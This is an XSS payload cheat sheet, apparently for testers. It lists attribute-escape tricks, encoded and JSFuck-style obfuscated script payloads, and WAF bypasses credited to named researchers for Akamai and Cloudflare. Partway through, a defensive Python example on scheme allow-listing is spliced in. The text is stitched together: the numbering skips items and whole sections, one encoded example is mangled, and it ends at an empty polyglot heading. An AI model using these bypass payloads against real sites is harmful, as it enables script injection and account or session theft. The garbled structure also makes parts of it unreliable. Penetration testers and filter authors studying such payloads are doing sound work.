XSS Advanced Payloads
1. If you cannot escape from the attribute (" is being encoded or deleted)
1) <a href="javascript:alert(1)">Click</a>
2) <a href="javascript:alert(1)">Click</a>
Or try to replace " with \u0022, > with \u003e and < with \u003c. So the payload will be:
2. If you can escape from the attribute but not from the tag (> is encoded or deleted)
3) <img src=x onerror="javascrip&#000116:alert('X&#083S')">
5) <a href=https://google.com
onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>
or use encoded characters:
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
Burp Suite > Convert Selection > HTML > HTML-encode all characters
<a href="javascript:alert(1)">Click</a> =
<a href="javascri
;pt:alert(1)">Clic
;k</a>
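As an added defender-side example that is not part of this cheat sheet, the Python below shows why the payloads in sections 1 and 2 survive quote-encoding: a javascript: URL in href contains nothing that attribute encoding touches, so the fix is a scheme allow-list (with the same tab/newline stripping browsers do before reading a scheme) applied before encoding; escaping & at the same time keeps the HTML-entity form from the Burp step above inert. All function and variable names are assumptions.

```python
import html
import re
from typing import Optional

# Browsers delete ASCII tab, LF and CR anywhere in a URL and drop leading
# C0 controls/spaces before reading the scheme, so "javascrip\nt:" and
# " JavaScript:" are still javascript: URLs. Mirror that before checking.
_STRIP_INSIDE = re.compile(r"[\t\n\r]")
_STRIP_LEADING = re.compile(r"^[\x00-\x20]+")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")
_ALLOWED_SCHEMES = {"http", "https", "mailto"}


def attr_encode(value: str) -> str:
    """Encode untrusted text for a double-quoted HTML attribute value.

    Escaping & as well as " < > means entity-encoded characters inside the
    injected value (the 'HTML-encode all characters' trick) are never decoded
    by the browser; they remain literal text.
    """
    return html.escape(value, quote=True)


def safe_href(value: str) -> Optional[str]:
    """Return the URL if it is relative or uses an allow-listed scheme, else None.

    This is the check that quote-encoding cannot replace: the string
    javascript:alert(1) has no character that attr_encode changes."""
    candidate = _STRIP_LEADING.sub("", _STRIP_INSIDE.sub("", value))
    match = _SCHEME.match(candidate)
    if match is None:
        return value  # relative URL such as /docs or #top
    return value if match.group(1).lower() in _ALLOWED_SCHEMES else None


def naive_render_link(href: str, text: str) -> str:
    """Quote-encoding only: exactly the situation described in section 1."""
    return f'<a href="{attr_encode(href)}">{html.escape(text)}</a>'


def render_link(href: str, text: str) -> str:
    """Scheme allow-list first, then attribute encoding."""
    checked = safe_href(href)
    if checked is None:
        checked = "#"  # neutralise rather than echo the rejected URL back
    return f'<a href="{attr_encode(checked)}">{html.escape(text)}</a>'


if __name__ == "__main__":
    # The page's own payload: survives quoting alone, blocked by the scheme check.
    print(naive_render_link("javascript:alert(1)", "Click"))
    print(render_link("javascript:alert(1)", "Click"))
```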
1) <script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</script>
2) <script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>
3) <script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+`(1)`)()</script>
4) <html>
<head>
<meta charset="utf-8">
</head>
<body>
<script>
ᐁ='',ᐃ=!ᐁ+ᐁ,ᐅ=!ᐃ+ᐁ,ᐊ=ᐁ+{},ᐄ=ᐃ[ᐁ++],ᐆ=ᐃ[ᐋ=ᐁ],ᐒ=++ᐋ+ᐁ,ᐗ=ᐊ[ᐋ+ᐒ],ᐃ[ᐗ+=ᐊ[ᐁ]+(ᐃ.ᐅ+ᐊ)[ᐁ]+ᐅ[ᐒ]+ᐄ+ᐆ+ᐃ[ᐋ]+ᐗ+ᐄ+ᐊ[ᐁ]+ᐆ][ᐗ](ᐅ[ᐁ]+ᐅ[ᐋ]+ᐃ[ᐒ]+ᐆ+ᐄ+"`ᐁᐃ`")()
</script>
</body>
</html>
5) <script>prompt(1)</script>
6) <a"/onclick=(confirm)()>Click Here!
7) <script>/&/-alert(1)</script>
9) <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`">
10) <bleh/onclick=top[/al/.source+/ert/.source]	``>click
12) <script>confirm.call(null,1)</script>
13) <script>prompt.call(null,1)</script>
Use a URL-encoded tab (%09) as the separator:
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>
<script>alert`1`</script>
@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc.
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
@LooseSecurity | Updated CloudFlare bypass (bypasses virtually all WAF you'll encounter in the wild):
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
Javascript URI cushioned between carriage returns with a non-bracketed prompt.
@brutelogic | Cloudflare
<Svg Only=1 OnLoad=alert(1)>
<script>eval.call`${'alert\x2823\x29'}`</script>
<img src=x onerror=this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,110,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59,39,62)>
7. XSS Polyglots: polyglots allow you to test multiple XSS scenarios with ONE payload. Work smarter, not harder: